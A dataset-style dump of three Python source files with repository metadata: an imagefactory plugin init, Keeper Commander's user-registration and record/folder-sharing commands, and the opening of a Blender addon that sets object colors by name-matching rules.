hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0f1c2d482a9d464ee63f7a050253a80eb52a5d47 | 659 | py | Python | imagefactory_plugins/Atlas/__init__.py | zyga/imagefactory | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | [
"Apache-2.0"
] | 1 | 2019-06-16T07:05:24.000Z | 2019-06-16T07:05:24.000Z | imagefactory_plugins/Atlas/__init__.py | zyga/imagefactory | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | [
"Apache-2.0"
] | null | null | null | imagefactory_plugins/Atlas/__init__.py | zyga/imagefactory | b2a57168f1ef6608aedad73ed7ccd1e3626b2967 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
# Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Atlas import Atlas as delegate_class
| 36.611111 | 76 | 0.737481 |
6c8143bcec986a0fd2ec04d249c3ab0573a6c5a7 | 44,514 | py | Python | keepercommander/commands/register.py | esa-security-deverlopment/Commander | 1cdba2e7ee3be17cba5ee5e6dc507e462dd6add5 | [
"MIT"
] | null | null | null | keepercommander/commands/register.py | esa-security-deverlopment/Commander | 1cdba2e7ee3be17cba5ee5e6dc507e462dd6add5 | [
"MIT"
] | null | null | null | keepercommander/commands/register.py | esa-security-deverlopment/Commander | 1cdba2e7ee3be17cba5ee5e6dc507e462dd6add5 | [
"MIT"
] | null | null | null | # _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# Keeper Commander
# Copyright 2018 Keeper Security Inc.
# Contact: ops@keepersecurity.com
#
import argparse
import getpass
import re
import os
import base64
import json
import logging
from urllib.parse import urlsplit, urlunsplit
from email.utils import parseaddr
from tabulate import tabulate
from Cryptodome.PublicKey import RSA
from Cryptodome.Util.asn1 import DerSequence
from Cryptodome.Math.Numbers import Integer
from .. import api, generator
from .record import RecordAddCommand
from ..params import KeeperParams
from ..subfolder import BaseFolderNode, try_resolve_path
from .enterprise import EnterpriseCommand, EnterprisePushCommand
from .base import raise_parse_exception, suppress_exit, Command
EMAIL_PATTERN=r"(?i)^[A-Z0-9._%+-]+@(?:[A-Z0-9-]+\.)+[A-Z]{2,}$"
def register_commands(commands):
commands['share-record'] = ShareRecordCommand()
commands['share-folder'] = ShareFolderCommand()
commands['share-report'] = ShareReportCommand()
commands['create-user'] = RegisterCommand()
def register_command_info(aliases, command_info):
aliases['sr'] = 'share-record'
aliases['sf'] = 'share-folder'
aliases['cu'] = 'create-user'
for p in [share_record_parser, share_folder_parser, share_report_parser, register_parser]:
command_info[p.prog] = p.description
share_record_parser = argparse.ArgumentParser(prog='share-record|sr', description='Change record share permissions')
share_record_parser.add_argument('-e', '--email', dest='email', action='append', required=True, help='account email')
share_record_parser.add_argument('-a', '--action', dest='action', choices=['grant', 'revoke', 'owner'], default='grant', action='store', help='user share action. \'grant\' if omitted')
share_record_parser.add_argument('-s', '--share', dest='can_share', action='store_true', help='can re-share record')
share_record_parser.add_argument('-w', '--write', dest='can_edit', action='store_true', help='can modify record')
share_record_parser.add_argument('record', nargs='?', type=str, action='store', help='record path or UID')
share_record_parser.error = raise_parse_exception
share_record_parser.exit = suppress_exit
share_folder_parser = argparse.ArgumentParser(prog='share-folder|sf', description='Change shared folder permissions')
share_folder_parser.add_argument('-a', '--action', dest='action', choices=['grant', 'revoke'], default='grant', action='store', help='shared folder action. \'grant\' if omitted')
share_folder_parser.add_argument('-u', '--user', dest='user', action='append', help='account email, team, or \'*\' as default folder permission')
share_folder_parser.add_argument('-r', '--record', dest='record', action='append', help='record name, record UID, or \'*\' as default folder permission')
share_folder_parser.add_argument('-p', '--manage-records', dest='manage_records', action='store_true', help='account permission: can manage records.')
share_folder_parser.add_argument('-o', '--manage-users', dest='manage_users', action='store_true', help='account permission: can manage users.')
share_folder_parser.add_argument('-s', '--can-share', dest='can_share', action='store_true', help='record permission: can be shared')
share_folder_parser.add_argument('-e', '--can-edit', dest='can_edit', action='store_true', help='record permission: can be modified.')
share_folder_parser.add_argument('folder', nargs='?', type=str, action='store', help='shared folder path or UID')
share_folder_parser.error = raise_parse_exception
share_folder_parser.exit = suppress_exit
share_report_parser = argparse.ArgumentParser(prog='share-report', description='Display report on record sharing')
share_report_parser.add_argument('-r', '--record', dest='record', action='append', help='record name or UID')
share_report_parser.add_argument('-u', '--user', dest='user', action='append', help='user email or team name')
#share_report_parser.add_argument('-s', '--can-share', dest='can_share', action='store_true', help='record permission: can be shared')
#share_report_parser.add_argument('-e', '--can-edit', dest='can_edit', action='store_true', help='record permission: can be modified.')
share_report_parser.error = raise_parse_exception
share_report_parser.exit = suppress_exit
register_parser = argparse.ArgumentParser(prog='create-user', description='Create Keeper User')
register_parser.add_argument('--store-record', dest='store', action='store_true', help='store credentials into Keeper record (must be logged in)')
register_parser.add_argument('--generate', dest='generate', action='store_true', help='generate password')
register_parser.add_argument('--pass', dest='password', action='store', help='user password')
register_parser.add_argument('--data-center', dest='data_center', choices=['us', 'eu'], action='store', help='data center.')
register_parser.add_argument('--node', dest='node', action='store', help='node name or node ID (enterprise only)')
register_parser.add_argument('--name', dest='name', action='store', help='user name (enterprise only)')
register_parser.add_argument('--expire', dest='expire', action='store_true', help='expire master password (enterprise only)')
register_parser.add_argument('--records', dest='records', action='store', help='populate vault with default records (enterprise only)')
register_parser.add_argument('--question', dest='question', action='store', help='security question')
register_parser.add_argument('--answer', dest='answer', action='store', help='security answer')
register_parser.add_argument('email', action='store', help='email')
register_parser.error = raise_parse_exception
register_parser.exit = suppress_exit
class RegisterCommand(Command):
def is_authorised(self):
return False
def get_parser(self):
return register_parser
@staticmethod
def get_iterations():
return 100000
def execute(self, params, **kwargs):
email = kwargs['email'] if 'email' in kwargs else None
if email:
_, email = parseaddr(email)
if not email:
logging.error('A valid email address is expected.')
return
rq = {
'command': 'pre_register',
'email': email
}
rs = api.run_command(params, rq)
if rs['result_code'] != 'Failed_to_find_user':
if rs['result'] == 'success':
logging.warning('User \'%s\' already exists in Keeper', email)
else:
logging.error(rs['message'])
return
password_rules = rs['password_rules']
# check enterprise
verification_code = None
if params.enterprise:
node_id = None
if kwargs.get('node'):
for node in params.enterprise['nodes']:
if kwargs['node'] in {str(node['node_id']), node['data'].get('displayname')}:
node_id = node['node_id']
break
elif not node.get('parent_id') and kwargs['node'] == params.enterprise['enterprise_name']:
node_id = node['node_id']
break
if node_id is None:
for node in params.enterprise['nodes']:
if not node.get('parent_id'):
node_id = node['node_id']
break
data = {}
name = kwargs.get('name')
if name:
data['displayname'] = name
else:
logging.error('\'name\' parameter is required for enterprise users')
return
rq = {
'command': 'enterprise_user_add',
'enterprise_user_id': EnterpriseCommand.get_enterprise_id(params),
'enterprise_user_username': email,
'encrypted_data': api.encrypt_aes(json.dumps(data).encode('utf-8'), params.enterprise['unencrypted_tree_key']),
'node_id': node_id,
'suppress_email_invite': True
}
try:
rs = api.communicate(params, rq)
if rs['result'] == 'success':
verification_code = rs.get('verification_code')
# re-read password rules
rq = {
'command': 'pre_register',
'email': email
}
rs = api.run_command(params, rq)
if 'password_rules' in rs:
password_rules = rs['password_rules']
except:
pass
password = kwargs['password'] if 'password' in kwargs else None
generate = kwargs['generate'] if 'generate' in kwargs else None
if generate:
password = generator.generate(16)
else:
while not password:
pwd = getpass.getpass(prompt='Password: ', stream=None)
failed_rules = []
for r in password_rules:
m = re.match(r['pattern'], pwd)
if r['match']:
if m is None:
failed_rules.append(r['description'])
else:
if m is not None:
failed_rules.append(r['description'])
if len(failed_rules) == 0:
password = pwd
else:
logging.error(rs['password_rules_intro'])
for fr in failed_rules:
logging.error(fr)
new_params = KeeperParams()
new_params.server = params.server
data_center = kwargs.get('data_center')
if data_center:
parts = list(urlsplit(new_params.server))
host = parts[1]
port = ''
colon_pos = host.rfind(':')
if colon_pos > 0:
port = host[colon_pos:]
host = host[:colon_pos]
suffix = '.eu' if data_center == 'eu' else '.com'
if not host.endswith(suffix):
dot_pos = host.rfind('.')
if dot_pos > 0:
host = host[:dot_pos] + suffix
parts[1] = host+port
new_params.server = urlunsplit(parts)
data_key = os.urandom(32)
iterations = self.get_iterations()
auth_salt = os.urandom(16)
enc_salt = os.urandom(16)
backup_salt = os.urandom(16)
rsa_key = RSA.generate(2048)
private_key = DerSequence([0,
rsa_key.n,
rsa_key.e,
rsa_key.d,
rsa_key.p,
rsa_key.q,
rsa_key.d % (rsa_key.p-1),
rsa_key.d % (rsa_key.q-1),
Integer(rsa_key.q).inverse(rsa_key.p)
]).encode()
pub_key = rsa_key.publickey()
public_key = DerSequence([pub_key.n,
pub_key.e
]).encode()
rq = {
'command': 'register',
'version': 1,
'email': email,
'auth_verifier': api.create_auth_verifier(password, auth_salt, iterations),
'encryption_params': api.create_encryption_params(password, enc_salt, iterations, data_key),
'encrypted_private_key': api.encrypt_aes(private_key, data_key),
'public_key': base64.urlsafe_b64encode(public_key).decode().rstrip('='),
'client_key': api.encrypt_aes(os.urandom(32), data_key)
}
if verification_code:
rq['verification_code'] = verification_code
rs = api.run_command(new_params, rq)
if rs['result'] == 'success':
logging.info("Created account: %s ", email)
if kwargs.get('question'):
if not kwargs.get('answer'):
print('...' + 'Security Question: '.rjust(24) + kwargs['question'])
kwargs['answer'] = input('...' + 'Security Answer: '.rjust(24))
if kwargs.get('answer'):
try:
param1 = KeeperParams()
param1.server = new_params.server
param1.user = email
param1.password = password
param1.rest_context.device_id = params.rest_context.device_id
api.login(param1)
answer = kwargs['answer'].lower().replace(' ', '')
rq = {
'command': 'set_data_key_backup',
'version': 2,
'data_key_backup': api.create_encryption_params(answer, backup_salt, iterations, data_key),
'security_question': kwargs['question'],
'security_answer_salt': base64.urlsafe_b64encode(backup_salt).decode().rstrip('='),
'security_answer_iterations': iterations,
'security_answer_hash': base64.urlsafe_b64encode(api.derive_key(answer, backup_salt, iterations)).decode().rstrip('=')
}
api.communicate(param1, rq)
logging.info('Master password backup is created.')
except Exception as e:
logging.error('Failed to create master password backup. %s', e)
if params.enterprise:
api.query_enterprise(params)
file_name = kwargs.get('records')
should_accept_share = False
if file_name:
try:
push = EnterprisePushCommand()
push.execute(params, user=[email], file=file_name)
should_accept_share = True
except Exception as e:
logging.info('Error accepting shares: %s', e)
# first accept shares from enterprise admin
if should_accept_share:
try:
param1 = KeeperParams()
param1.server = new_params.server
param1.user = email
param1.password = password
param1.rest_context.device_id = params.rest_context.device_id
api.login(param1)
rq = {
'command': 'accept_share',
'from_email': params.user
}
api.communicate(param1, rq)
except Exception as e:
logging.info('Error accepting shares: %s', e)
# last expire password
if kwargs.get('expire'):
try:
rq = {
'command': 'set_master_password_expire',
'email': email
}
api.communicate(params, rq)
except Exception as e:
logging.info('Error expiring master password: %s', e)
store = kwargs['store'] if 'store' in kwargs else None
if store:
if params.session_token:
try:
add_command = RecordAddCommand()
add_command.execute(params, title='Keeper credentials for {0}'.format(email), login=email, password=password, force=True)
except Exception:
store = False
logging.error('Failed to create record in Keeper')
else:
store = False
if generate and not store:
logging.warning('Generated password: %s', password)
if params.enterprise:
api.query_enterprise(params)
else:
logging.error(rs['message'])
class ShareFolderCommand(Command):
def get_parser(self):
return share_folder_parser
def execute(self, params, **kwargs):
folder = None
name = kwargs.get('folder')
if name:
if name in params.folder_cache:
folder = params.folder_cache[name]
else:
rs = try_resolve_path(params, name)
if rs is not None:
folder, name = rs
if len(name or '') > 0:
folder = None
elif folder.type == BaseFolderNode.RootFolderType:
folder = None
if folder is None:
logging.error('Enter name of the existing folder')
return
if folder.type not in {BaseFolderNode.SharedFolderType, BaseFolderNode.SharedFolderFolderType}:
logging.error('You can change permission of shared folders only')
return
shared_folder_uid = folder.shared_folder_uid if folder.type == BaseFolderNode.SharedFolderFolderType else folder.uid
if shared_folder_uid in params.shared_folder_cache:
sh_fol = params.shared_folder_cache[shared_folder_uid]
#TODO check permission to modify shared folder
action = kwargs.get('action') or 'grant'
public_keys = {}
team_keys = {}
default_account = False
if 'user' in kwargs:
emails = []
teams = []
for u in (kwargs.get('user') or []):
if u == '*':
default_account = True
else:
em = re.match(EMAIL_PATTERN, u)
if not em is None:
emails.append(u)
else:
team_uid = None
for tid in params.team_cache:
if tid == u or params.team_cache[tid]['name'].lower() == u.lower():
team_uid = params.team_cache[tid]['team_uid']
break
if team_uid:
teams.append(team_uid)
else:
logging.warning('User %s could not be resolved as email or team', u)
if len(emails) > 0:
rq = {
'command': 'public_keys',
'key_owners': emails
}
rs = api.communicate(params, rq)
if 'public_keys' in rs:
for pk in rs['public_keys']:
if 'public_key' in pk:
email = pk['key_owner'].lower()
if email != params.user.lower():
public_keys[email] = pk['public_key']
else:
logging.warning('\'%s\' is not a known Keeper account', pk['key_owner'])
if len(teams) > 0:
rq = {
'command': 'team_get_keys',
'teams': teams
}
rs = api.communicate(params, rq)
if 'keys' in rs:
for tk in rs['keys']:
if 'key' in tk:
team_uid = tk['team_uid']
if tk['type'] == 1:
team_keys[team_uid] = api.decrypt_data(tk['key'], params.data_key)
elif tk['type'] == 2:
team_keys[team_uid] = api.decrypt_rsa(tk['key'], params.rsa_key)
elif tk['type'] == 3:
team_keys[team_uid] = base64.urlsafe_b64decode(tk['key'] + '==')
record_uids = []
default_record = False
if 'record' in kwargs:
records = kwargs.get('record') or []
for r in records:
if r == '*':
default_record = True
elif r in params.record_cache:
record_uids.append(r)
else:
r_uid = None
rs = try_resolve_path(params, r)
if rs is not None:
sf, name = rs
if name:
shared_folder_uid = sf.uid or ''
if shared_folder_uid in params.subfolder_record_cache:
for uid in params.subfolder_record_cache[shared_folder_uid]:
rec = api.get_record(params, uid)
if name in {rec.title, rec.record_uid}:
r_uid = rec.record_uid
break
if r_uid:
record_uids.append(r_uid)
else:
logging.error('\'%s\' is not an existing record title or UID', r)
request = {
'command': 'shared_folder_update',
'pt': 'Commander',
'operation': 'update',
'shared_folder_uid': sh_fol['shared_folder_uid'],
'revision': sh_fol['revision']
}
if default_account:
if kwargs.get('manage_records'):
request['default_manage_records'] = action == 'grant'
if kwargs.get('manage_users'):
request['default_manage_users'] = action == 'grant'
if default_record:
if kwargs.get('can_edit'):
request['default_can_edit'] = action == 'grant'
if kwargs.get('can_share'):
request['default_can_share'] = action == 'grant'
if len(public_keys) > 0:
email_set = set()
if 'users' in sh_fol:
for user in sh_fol['users']:
email_set.add(user['username'])
mr = kwargs.get('manage_records')
mu = kwargs.get('manage_users')
for email in public_keys:
uo = {
'username': email
}
share_action = ''
if email in email_set:
if action == 'grant':
if mr:
uo['manage_records'] = True
if mu:
uo['manage_users'] = True
share_action = 'update_users'
else:
if mr or mu:
if mr:
uo['manage_records'] = False
if mu:
uo['manage_users'] = False
share_action = 'update_users'
else:
share_action = 'remove_users'
elif action == 'grant':
uo['manage_records'] = mr
uo['manage_users'] = mu
rsa_key = RSA.importKey(base64.urlsafe_b64decode(public_keys[email] + '=='))
uo['shared_folder_key'] = api.encrypt_rsa(sh_fol['shared_folder_key_unencrypted'], rsa_key)
share_action = 'add_users'
if share_action:
if not share_action in request:
request[share_action] = []
request[share_action].append(uo)
if len(team_keys) > 0:
team_set = set()
if 'teams' in sh_fol:
for team in sh_fol['teams']:
team_set.add(team['team_uid'])
mr = kwargs.get('manage_records')
mu = kwargs.get('manage_users')
for team_uid in team_keys:
to = {
'team_uid': team_uid
}
share_action = ''
if team_uid in team_set:
if action == 'grant':
if mr:
to['manage_records'] = True
if mu:
to['manage_users'] = True
share_action = 'update_teams'
else:
if mr or mu:
if mr:
to['manage_records'] = False
if mu:
to['manage_users'] = False
share_action = 'update_teams'
else:
share_action = 'remove_teams'
elif action == 'grant':
to['manage_records'] = mr
to['manage_users'] = mu
to['shared_folder_key'] = api.encrypt_aes(sh_fol['shared_folder_key_unencrypted'], team_keys[team_uid])
share_action = 'add_teams'
if share_action:
if not share_action in request:
request[share_action] = []
request[share_action].append(to)
if len(record_uids) > 0:
ruid_set = set()
if 'records' in sh_fol:
for r in sh_fol['records']:
ruid_set.add(r['record_uid'])
team_uid = ''
if not 'key_type' in sh_fol:
if 'teams' in sh_fol:
for team in sh_fol['teams']:
team_uid = team['team_uid']
if team.get('manage_records'):
break
for record_uid in record_uids:
ro = {
'record_uid': record_uid
}
if team_uid:
ro['team_uid'] = team_uid
ro['shared_folder_uid'] = sh_fol['shared_folder_uid']
share_action = ''
ce = kwargs.get('can_edit')
cs = kwargs.get('can_share')
if record_uid in ruid_set:
if action == 'grant':
if ce:
ro['can_edit'] = True
if cs:
ro['can_share'] = True
share_action = 'update_records'
else:
if ce or cs:
if ce:
ro['can_edit'] = False
if cs:
ro['can_share'] = False
share_action = 'update_records'
else:
share_action = 'remove_records'
else:
if action == 'grant':
ro['can_edit'] = ce
ro['can_share'] = cs
rec = params.record_cache[record_uid]
ro['record_key'] = api.encrypt_aes(rec['record_key_unencrypted'], sh_fol['shared_folder_key_unencrypted'])
share_action = 'add_records'
if share_action:
if not share_action in request:
request[share_action] = []
request[share_action].append(ro)
response = api.communicate(params, request)
params.sync_data = True
for node in ['add_teams', 'update_teams', 'remove_teams']:
if node in response:
for t in response[node]:
team = api.get_team(params, t['team_uid'])
if t['status'] == 'success':
logging.warning('Team share \'%s\' %s', team.name, 'added' if node =='add_teams' else 'updated' if node == 'update_teams' else 'removed')
else:
logging.error('Team share \'%s\' failed', team.name)
for node in ['add_users', 'update_users', 'remove_users']:
if node in response:
for s in response[node]:
if s['status'] == 'success':
logging.warning('User share \'%s\' %s', s['username'], 'added' if node =='add_users' else 'updated' if node == 'update_users' else 'removed')
elif s['status'] == 'invited':
logging.warning('User \'%s\' invited', s['username'])
else:
logging.error('User share \'%s\' failed', s['username'])
for node in ['add_records', 'update_records', 'remove_records']:
if node in response:
for r in response[node]:
rec = api.get_record(params, r['record_uid'])
if r['status'] == 'success':
logging.warning('Record share \'%s\' %s', rec.title, 'added' if node =='add_records' else 'updated' if node == 'update_records' else 'removed')
else:
logging.error('Record share \'%s\' failed', rec.title)
class ShareRecordCommand(Command):
def get_parser(self):
return share_record_parser
def execute(self, params, **kwargs):
name = kwargs['record'] if 'record' in kwargs else None
if not name:
self.get_parser().print_help()
return
record_uid = None
if name in params.record_cache:
record_uid = name
else:
rs = try_resolve_path(params, name)
if rs is not None:
folder, name = rs
if folder is not None and name is not None:
folder_uid = folder.uid or ''
if folder_uid in params.subfolder_record_cache:
for uid in params.subfolder_record_cache[folder_uid]:
r = api.get_record(params, uid)
if r.title.lower() == name.lower():
record_uid = uid
break
if record_uid is None:
logging.error('Enter name or uid of existing record')
return
emails = kwargs.get('email') or []
if not emails:
logging.error('\'email\' parameter is missing')
return
public_keys = {}
rq = {
'command': 'public_keys',
'key_owners': emails
}
rs = api.communicate(params, rq)
if 'public_keys' in rs:
for pk in rs['public_keys']:
if 'public_key' in pk:
email = pk['key_owner'].lower()
if email != params.user.lower():
public_keys[email] = pk['public_key']
else:
logging.error('\'%s\' is not a known Keeper account', pk['key_owner'])
if len(public_keys) == 0:
logging.error('No existing Keeper accounts provided.')
return
record_path = api.resolve_record_share_path(params, record_uid)
if record_path is None:
logging.error('You do not have permissions to share this record.')
return
rq = {
'command': 'get_records',
'include': ['shares'],
'records': [record_path]
}
rs = api.communicate(params, rq)
existing_shares = {}
if 'records' in rs:
if 'user_permissions' in rs['records'][0]:
for po in rs['records'][0]['user_permissions']:
existing_shares[po['username'].lower()] = po
can_edit = kwargs.get('can_edit') or False
can_share= kwargs.get('can_share') or False
record_key = params.record_cache[record_uid]['record_key_unencrypted']
rq = {
'command': 'record_share_update',
'pt': 'Commander'
}
action = kwargs.get('action') or 'grant'
if action == 'owner':
if len(public_keys) > 1:
logging.error('You can transfer ownership to a single account only')
return
for email in public_keys:
current = existing_shares.get(email)
ro = {
'to_username': email
}
ro.update(record_path)
share_action = ''
if action == 'grant':
if current is None:
rsa_key = RSA.importKey(base64.urlsafe_b64decode(public_keys[email] + '=='))
ro['record_key'] = api.encrypt_rsa(record_key, rsa_key)
ro['editable'] = can_edit,
ro['shareable'] = can_share
else:
ro['editable'] = True if can_edit else current['editable']
ro['shareable'] = True if can_share else current['shareable']
share_action = 'add_shares' if current is None else 'update_shares'
elif action == 'revoke':
if not current is None:
if can_share or can_edit:
ro['editable'] = False if can_edit else current['editable']
ro['shareable'] = False if can_share else current['shareable']
share_action = 'update_shares'
else:
share_action = 'remove_shares'
elif action == 'owner':
if record_uid in params.meta_data_cache and params.meta_data_cache[record_uid].get('owner'):
ro['transfer'] = True
if current is None:
rsa_key = RSA.importKey(base64.urlsafe_b64decode(public_keys[email] + '=='))
ro['record_key'] = api.encrypt_rsa(record_key, rsa_key)
share_action = 'add_shares'
else:
share_action = 'update_shares'
else:
logging.error('You should be a record owner to be able to transfer ownership')
return
else:
pass
if share_action:
if share_action not in rq:
rq[share_action] = []
rq[share_action].append(ro)
rs = api.communicate(params, rq)
if 'add_statuses' in rs:
emails = [x['to_username'] for x in rs['add_statuses'] if x['status'] in ['success']]
if emails:
logging.info('Record is successfully shared with: %s', ', '.join(emails))
emails = [x['to_username'] for x in rs['add_statuses'] if x['status'] in ['pending_accept']]
if emails:
logging.info('Recipient must accept request to complete sharing. Invitation sent to %s. ', ', '.join(emails))
emails = [x['to_username'] for x in rs['add_statuses'] if x['status'] not in ['success', 'pending_accept']]
if emails:
logging.info('Failed to share record with: %s', ', '.join(emails))
if 'remove_statuses' in rs:
emails = [x['to_username'] for x in rs['remove_statuses'] if x['status'] == 'success']
if emails:
logging.info('Stopped sharing record with: %s', ', '.join(emails))
class ShareReportCommand(Command):
def get_parser(self):
return share_report_parser
def execute(self, params, **kwargs):
record_uids = []
user_filter = set()
record_filter = set()
if kwargs.get('record'):
records = kwargs.get('record') or []
for r in records:
if r in params.record_cache:
record_filter.add(r)
else:
r_uid = None
rs = try_resolve_path(params, r)
if rs is not None:
sf, name = rs
if name:
shared_folder_uid = sf.uid or ''
if shared_folder_uid in params.subfolder_record_cache:
for uid in params.subfolder_record_cache[shared_folder_uid]:
rec = api.get_record(params, uid)
if name in {rec.title, rec.record_uid}:
r_uid = rec.record_uid
break
if r_uid:
record_filter.add(r_uid)
else:
logging.error('\'%s\' is not an existing record title or UID', r)
return
record_uids = [x for x in record_filter]
elif kwargs.get('user'):
for u in kwargs['user']:
user_filter.add(u)
record_uids = [x['record_uid'] for x in params.record_cache.values() if x['shared']]
else:
record_uids = [x['record_uid'] for x in params.record_cache.values() if x['shared']]
api.get_record_shares(params, record_uids)
record_shares = {}
sf_shares = {}
for uid in record_uids:
record = params.record_cache[uid]
if 'shares' in record:
if 'user_permissions' in record['shares']:
for up in record['shares']['user_permissions']:
user_name = up['username']
if user_filter:
if user_name not in user_filter:
continue
if user_name not in record_shares:
record_shares[user_name] = set()
if uid not in record_shares[user_name]:
record_shares[user_name].add(uid)
if 'shared_folder_permissions' in record['shares']:
names = set()
for sfp in record['shares']['shared_folder_permissions']:
shared_folder_uid = sfp['shared_folder_uid']
if shared_folder_uid in params.shared_folder_cache:
shared_folder = params.shared_folder_cache[sfp['shared_folder_uid']]
names.clear()
if 'users' in shared_folder:
for u in shared_folder['users']:
user_name = u['username']
if user_filter:
if user_name not in user_filter:
continue
names.add(user_name)
if 'teams' in shared_folder:
for t in shared_folder['teams']:
user_name = t['name']
if user_filter:
if user_name not in user_filter:
continue
names.add(user_name)
for user_name in names:
if user_name not in sf_shares:
sf_shares[user_name] = set()
if shared_folder_uid not in sf_shares[user_name]:
sf_shares[user_name].add(shared_folder_uid)
if 'records' in shared_folder:
for sfr in shared_folder['records']:
uid = sfr['record_uid']
if record_filter:
if not uid in record_filter:
continue
for user_name in names:
if user_filter:
if user_name not in user_filter:
continue
if user_name not in record_shares:
record_shares[user_name] = set()
if uid not in record_shares[user_name]:
record_shares[user_name].add(uid)
if kwargs.get('record'):
if len(record_shares) > 0:
users_shares = {}
for user in record_shares:
for uid in record_shares[user]:
if uid not in users_shares:
users_shares[uid] = set()
users_shares[uid].add(user)
for record_uid in users_shares:
record = api.get_record(params, record_uid)
print('')
print('{0:>20s} {1}'.format('Record UID:', record.record_uid))
print('{0:>20s} {1}'.format('Title:', record.title))
for i, user in enumerate(users_shares[record_uid]):
print('{0:>20s} {1}'.format('Shared with:' if i == 0 else '', user))
print('')
elif kwargs.get('user'):
if len(record_shares) > 0:
user_names = [x for x in record_shares.keys()]
user_names.sort()
headers = ['#', 'Record UID', 'Title']
for user in user_names:
record_uids = record_shares[user]
records = [api.get_record(params, x) for x in record_uids]
records.sort(key=lambda x: x.title.lower())
table = [[i+1, r.record_uid, r.title] for i, r in enumerate(records)]
print('')
print('Records shared with: {0}'.format(user))
print('')
print(tabulate(table, headers=headers))
print('')
if len(sf_shares) > 0:
user_names = [x for x in sf_shares.keys()]
user_names.sort(key=lambda x: x.lower())
headers = ['#', 'Shared Folder UID', 'Name']
for user in user_names:
sf_uids = sf_shares[user]
sfs = [api.get_shared_folder(params, x) for x in sf_uids]
sfs.sort(key=lambda x: x.name.lower())
table = [[i+1, sf.shared_folder_uid, sf.name] for i, sf in enumerate(sfs)]
print('')
print('Folders shared with: {0}'.format(user))
print('')
print(tabulate(table, headers=headers))
print('')
else:
if params.user in record_shares:
del record_shares[params.user]
if params.user in sf_shares:
del sf_shares[params.user]
headers = ['#', 'Shared to', 'Records']
table = [(s[0], len(s[1])) for s in record_shares.items()]
table.sort(key=lambda x: x[1], reverse=True)
table = [[i+1, s[0], s[1]] for i, s in enumerate(table)]
print('')
print(tabulate(table, headers=headers))
print('')
| 45.796296 | 184 | 0.481781 |
2851f310618c8917f3028e1bb80b50a4be466a29 | 14,826 | py | Python | engine/2.80/scripts/addons_contrib/object_color_rules.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | 2 | 2019-03-20T13:10:46.000Z | 2019-05-15T20:00:31.000Z | engine/2.80/scripts/addons_contrib/object_color_rules.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | engine/2.80/scripts/addons_contrib/object_color_rules.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | # ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ***** END GPL LICENCE BLOCK *****
bl_info = {
"name": "Object Color Rules",
"author": "Campbell Barton",
"version": (0, 0, 1),
"blender": (2, 73, 0),
"location": "Properties > Object Buttons",
"description": "Rules for assigning object color (used for wireframe colors).",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Object/Color_Rules",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Object",
}
def test_name(rule, needle, haystack):
# TODO, compile expression for re-use
if rule.use_match_regex:
import re
return (re.match(needle, haystack) is not None)
else:
return (needle in haystack)
class rule_test:
__slots__ = ()
def __new__(cls, *args, **kwargs):
raise RuntimeError("%s should not be instantiated" % cls)
@staticmethod
def NAME(obj, rule, cache):
match_name = rule.match_name
return test_name(rule, match_name, obj.name)
def DATA(obj, rule, cache):
match_name = rule.match_name
obj_data = obj.data
if obj_data is not None:
return test_name(rule, match_name, obj_data.name)
else:
return False
@staticmethod
def GROUP(obj, rule, cache):
if not cache:
match_name = rule.match_name
objects = {o for g in bpy.data.collections if test_name(rule, match_name, g.name) for o in g.objects}
cache["objects"] = objects
else:
objects = cache["objects"]
return obj in objects
@staticmethod
def MATERIAL(obj, rule, cache):
match_name = rule.match_name
